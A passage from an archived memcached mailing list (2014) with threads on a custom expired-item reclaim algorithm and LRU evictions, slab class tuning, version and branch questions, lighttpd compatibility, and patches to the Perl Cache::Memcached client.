  gave it full 16G and just restart it each week to be sure memory usage is
  kept in check, and we're not throwing away good data. Actually after 
  changing -f1.25 to -f1.041 the slabs are filling with bad items much slower,
  because items are distributed better and this custom eviction function is 
  able to catch more expired data. We have like 200GB of data evicted this
  way, daily. Because of volume (~40k req/s peak, much of it are writes) and 
  differences in expire time LRU isn't able to reclaim items efficiently.
 
  Maybe people don't even realize the problem, but when we done some testing 
  and turned off that custom eviction we had like 100% memory used with
  10% of waste reported by memcached admin. But then we run that custom 
  eviction algorithm it turned out that 90% of memory is occupied by garbage.
  Waste reported grew to 80% instantly after running unlimited reclaim 
  expired on all items in the cache. So in standard client when people will
  be using different expire times for items (we have it like 1minute minimum, 
  6h max)... they even won't be able to see how much memory they're
  wasting in some specific cases, when they'll have many items that won't be 
  hit after expiration, like we have.
 
  When using memcached as a buffer for mysql writes, we know exactly what to 
  hit and when. Short TTL expired items, pile up near the head... long TTL
  live items pile up near the tail and it's creating a barrier that 
  prevents the LRU algo to reclaim almost anything, if im getting how it
  currently works, correctly...
 
  You made it sound like you had some data which never expired? Is this 
  true? 
  Yes, i think because of how evictions are made (to be clear we're not 
  setting non-expiring items). These short expiring items pile up in the front
  of linked list, something

Re: Idea for reclaimation algo

2014-04-10 Thread dormando

 Hey Dormando, thanks again for some comments... appreciate the help.

 Maybe i wasn't clear enough. I need only 1 minute persistence, and i can lose 
 data sometimes, just i can't keep loosing data every minute due to
 constant evictions caused by LRU. Actually i have just wrote that in my 
 previous post. We're loosing about 1 minute of non-meaningfull data every
 week because of restart that we do when memory starts to fill up (even with 
 our patch reclaiming using linked list, we limit reclaiming to keep
 speed better)... so the memory fills up after a week, not 30 minutes...

Can you explain what you're seeing in more detail? Your data only needs to
persist for 1 minute, but it's being evicted before 1 minute is up?

You made it sound like you had some data which never expired? Is this
true?

If your instance is 16GB, takes a week to fill up, but data only needs to
persist for a minute but isn't, something else is very broken? Or am I
still misunderstanding you?

 Now im creating better solution, to limit locking as linked list is getting 
 bigger.

 I explained what was worst implications of unwanted evictions (or loosing all 
 data in cache) in my use case:
 1. loosing ~1 minute of non-significant data that's about to be stored in sql
 2. flat distribution of load to workers (not taking response times into 
 account because stats reset).
 3. resorting to alternative targeting algorithm (with global, not local 
 statistics).

 I never, ever said im going to write data that have to be persistent 
 permanently. It's actually same idea as delayed write. If power fails you
 loose 5s of data, but you can do 100x more writes. So you need the data to be 
 persistent in memory, between writes the data **can't be lost**.
 However you can lose it sometimes, that's the tradeoff that some people can 
 make and some not. Obviously I can't keep loosing this data each
 minute, because if i loose much it'll become meaningfull.

 Maybe i wasn't clear in that matter. I can loose all data even 20 times a 
 day. Sensitive data is stored using bulk update or transactions,
 bypassing that delayed write layer. 0 evictions, that's the kind of 
 persistence im going for. So items are persistent for some very short
 periods of time (1-5 minutes) without being killed. It's just different use 
 case. Running in production since 2 years, based on 1.4.13, tested for
 corectness, monitored so we have enough memory and 0 evictions (just reclaims)

 When i came here with same idea ~2 years ago you just said it's very stupid, 
 now you even made me look like a moron :) And i can understand why you
 don't want features that are not ~O(1) perfectly, but please don't get so 
 personal about different ideas to do things and use cases, just because
 these won't work for you.





 W dniu czwartek, 10 kwietnia 2014 20:53:12 UTC+2 użytkownik Dormando napisał:
   You really really really really really *must* not put data in memcached
   which you can't lose.

   Seriously, really don't do it. If you need persistence, try using a 
 redis
   instance for the persistent stuff, and use memcached for your cache 
 stuff.
   I don't see why you feel like you need to write your own thing, 
 there're a
   lot of persistent key/value stores (kyotocabinet/etc?). They have a much
   lower request ceiling and don't handle the LRU/cache pattern as well, 
 but
   that's why you can use both.

   Again, please please don't do it. You are damaging your company. You 
 are a
   *danger* to your company.

   On Thu, 10 Apr 2014, Slawomir Pryczek wrote:

Hi Dormando, thanks for suggestions, background thread would be 
 nice...
The idea is actually that with 2-3GB i get plenty of evictions of 
 items that need to be fetched later. And with 16GB i still get
   evictions,
actually probably i could throw more memory than 16G and it'd only 
 result in more expired items sitting in the middle of slabs,
   forever... Now im
going for persistence. Sounds probably crazy, but we're having some 
 data that we can't loose:
1. statistics, we aggregate writes to DB using memcached (+list 
 implementation). If these items get evicted we're loosing rows in db.
   Loosing data
sometimes isn't a big problem. Eg. we restart memcached once a week 
 so we're loosing 1 minute of data every week. But if we have
   evictions we're
loosing data constantly (which we can't have)
2. we drive load balancer using data in memcached for statistics, 
 again, not nice to loose data often because workers can get
   incorrect amount of
traffic.
3. we're doing some adserving optimizations, eg. counting per-domain 
 ad priority, for one domain it takes about 10 seconds to analyze
   all data and
create list of ads, so can't be done online... we put result of this 
 in memcached, if we loose too much of this the system will start

Re: Memcached version 1.4, 1.6

2014-04-09 Thread dormando
1.4 is the latest stable. 1.6 is a development branch.

On Tue, 8 Apr 2014, Vakul Garg wrote:

 Hi
 Which is the latest memcached version (1.4 or 1.6)?
 I do not see engine-pu branch on memcached git.

 Is memcached version 1.6 deprecated?

 Regards

 Vakul

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Idea for reclaimation algo

2014-04-09 Thread dormando
 Hi Guys,
 im running a specific case where i don't want (actually can't have) to have 
 evicted items (evictions = 0 ideally)... now i have created some simple
 algo that lock the cache, goes through linked list and evicts items... it 
 makes some problems, like 10-20ms cache locks on some cases.

 Now im thinking about going through each slab memory (slabs keep a list of 
 allocated memory regions) ... looking for items, if expired item is
 found, evict it... this way i can go eg. 10k items or 1MB of memory at a time 
 + pick slabs with high utilization and run this additional eviction
 only on them... so it'll prevent allocating memory just because unneded data 
 with short TTL is occupying HEAD of the list.

 With this linked list eviction im able to run on 2-3GB of memory... without 
 it 16GB of memory is exhausted in 1-2h and then memcached starts to
 kill good items (leaving expired ones wasting memory)...

 Any comments?
 Thanks.

you're going a bit against the base algorithm. if stuff is falling out of
16GB of memory without ever being utilized again, why is that critical?
Sounds like you're optimizing the numbers instead of actually tuning
anything useful.

That said, you can probably just extend the slab rebalance code. There's a
hook in there (which I called Angry birds mode) that drives a slab
rebalance when it'd otherwise run an eviction. That code already safely
walks the slab page for unlocked memory and frees it; you could edit it
slightly to check for expiration and then freelist it into the slab class
instead.

Since it's already a background thread you could further modify it to just
wake up and walk pages for stuff to evict.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: memcached master branch - production safe?

2014-04-08 Thread dormando
just use master.

On Tue, 8 Apr 2014, Slawomir Pryczek wrote:

 Is it safe to use master branch code in production enviroment? When adding 
 changes to code i can just fork master and use that safely, or i'll need
 to make modifications on 1.4.17 code available from the website?
 I noticed there are some differences between 1.4.17 version and the code 
 available on that branch...

 Thanks.

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Setting slab class number.

2014-04-05 Thread dormando
It's not presently possible to do either. I would like to allow people to
supply the slab classes specifically, but we haven't done it yet.

2000 slab classes has its own set of inefficiencies. You should still keep
the number relatively low.

On Wed, 2 Apr 2014, Slawomir Pryczek wrote:

 Hi guys, i noticed there's some limit in slab classes number.
 http://screencast.com/t/RqUovWXVLS
 Is it possible to have eg. 2000 slab classes?

 Alternatively, can i just set limit of all these individually, by typing eg. 
 200 tab separated numbers

 What i want to achieve is to have better distribuition of slabs, optimized 
 for storing very small values
 1. 10bytes
 2. 11bytes
 [..]
 100. 10kb
 101. 15kb
 [..]
 189. 100kb
 190. 150kb
 etc.

 It seems that it isn't possible with current formula and -f attribute.

 Thanks,
 Slawomir.

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: MemCached with Liighttpd

2014-03-23 Thread dormando
The memcached library that lighttpd uses, last I checked, was synchronous.
Lighttpd is an async webserver, which means each time it needs to fetch
something from memcached it will block the entire thing waiting for a
response.

It won't block very long, mind you, but it can't process in parallel.
Unless you aren't talking about using memcached from *within* lighttpd,
which then it probably doesn't matter.

If you intend to push a ton of traffic it might bite you. If not, you'll
be fine with it the way it is.

On Sat, 22 Mar 2014, jResponse IDE wrote:

 Thank you, Ryan.

 On Sunday, March 23, 2014 2:31:36 AM UTC+1, Ryan McElroy wrote:
   Lots of people successfully have used both together, but they aren't 
 closely related in any way that I'm aware of so I wouldn't expect
   any conflicts. Is there anything in particular you're worried about? 
 The only thing I can think of is that a library you're using to
   access memcached might not support lighttpd for some reason, but you 
 can probably verify that by reading up on your library and testing
   it before switching over.
 Best of luck!

 ~Ryan




 On Sat, Mar 22, 2014 at 1:57 PM, jResponse IDE jrespo...@gmail.com wrote:
   Am I likely to run into any nasty surprises using memcached with 
 lighthttpd?  I have used it often enough in a standard LAMP
   setup but I now need to move to a setup with Lighttpd and MariaDB on an 
 Ubuntu 12.04 box.  I would imagine that it will work but
   I thought it  best to post here and verify.  I'd be much obliged for 
 any feedback.

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Cache::Memcached updates / patches

2014-03-12 Thread dormando


On Wed, 12 Mar 2014, Joshua Miller wrote:

 On Wed, Mar 12, 2014 at 12:43 AM, dormando dorma...@rydia.net wrote:


 https://github.com/unrtst/Cache-Memcached/tree/20140223-patch-cas-support
   
This started as just wanting to get a couple small features into 
 Cache::Memcached, but I ended up squashing a bunch of bugs (and
   merging bugfixes
from existing and old RT tickets), and kept adding features.
   
The repo above includes:
* benchmarks (to make sure i didn't slow it down)
* utf8 key fixes
* utf8 value support
* compress_ratio
* compress_methods
* serialize_methods
* hash_namespace
* max_size
* digest_keys_method and digest_keys_enable
* digest_keys_threshold
* touch
* server_versions
* cas, gets, gets_multi
* cas patch for GetParserXS: 
 https://github.com/unrtst/memcached/tree/master/trunk/api/xs/Cache-Memcached-GetParserXS
   
All of those are available under Cache::Memcached::Fast except for 
 the digest_keys* items. There's some public and open debates
   regarding whether
or not using a digest as the key is a good idea, but I want to use 
 it, and having the option is virtual free, so I included it.
Cache::Memcached::Fast::Safe automatically uses a digest if the key 
 length exceeds 200 characters, so it's not without precedent.
   
I plan on adding ketama (aka consistent hash) support very soon.
   
It's probably still advisable to point users to 
 Cache::Memcached::Fast or Cache::Memcached::libmemcached, but fixing the bugs 
 in this
   module and
bringing it up to feature parity can't hurt. I almost wish I had 
 given up on C:M and used one of the others instead, but this has
   been rewarding in
its own way.
   
It would be nice to see these make it to a CPAN release... anyone 
 know who to reach out to for that (one of the RT tickets had said
   to come here)?
   
I'd also welcome any additional review of the branch.
   
Thank you,
--
Josh I.

 I should probably just give the thing to you. Would you like me to review
 your work and cut releases or, what would be best?


 If you've got a little time, an extra pair of eyeballs never hurts. 
 Otherwise, I'd be happy to co-maintain and cut releases (user unrtst on
 pause/cpan).
 --
 Josh I.

I'm not sure I do have time... I'll see about looking it over this weekend
maybe. If they look sane I'll see about co-maint.

Thanks for taking the time.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Cache::Memcached updates / patches

2014-03-11 Thread dormando

 https://github.com/unrtst/Cache-Memcached/tree/20140223-patch-cas-support

 This started as just wanting to get a couple small features into 
 Cache::Memcached, but I ended up squashing a bunch of bugs (and merging 
 bugfixes
 from existing and old RT tickets), and kept adding features.

 The repo above includes:
 * benchmarks (to make sure i didn't slow it down)
 * utf8 key fixes
 * utf8 value support
 * compress_ratio
 * compress_methods
 * serialize_methods
 * hash_namespace
 * max_size
 * digest_keys_method and digest_keys_enable
 * digest_keys_threshold
 * touch
 * server_versions
 * cas, gets, gets_multi
 * cas patch for GetParserXS: 
 https://github.com/unrtst/memcached/tree/master/trunk/api/xs/Cache-Memcached-GetParserXS

 All of those are available under Cache::Memcached::Fast except for the 
 digest_keys* items. There's some public and open debates regarding whether
 or not using a digest as the key is a good idea, but I want to use it, and 
 having the option is virtual free, so I included it.
 Cache::Memcached::Fast::Safe automatically uses a digest if the key length 
 exceeds 200 characters, so it's not without precedent.

 I plan on adding ketama (aka consistent hash) support very soon.

 It's probably still advisable to point users to Cache::Memcached::Fast or 
 Cache::Memcached::libmemcached, but fixing the bugs in this module and
 bringing it up to feature parity can't hurt. I almost wish I had given up on 
 C:M and used one of the others instead, but this has been rewarding in
 its own way.

 It would be nice to see these make it to a CPAN release... anyone know who to 
 reach out to for that (one of the RT tickets had said to come here)?

 I'd also welcome any additional review of the branch.

 Thank you,
 --
 Josh I.

I should probably just give the thing to you. Would you like me to review
your work and cut releases or, what would be best?

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


<    1   2   3   4   5   6   7   8   9   10   >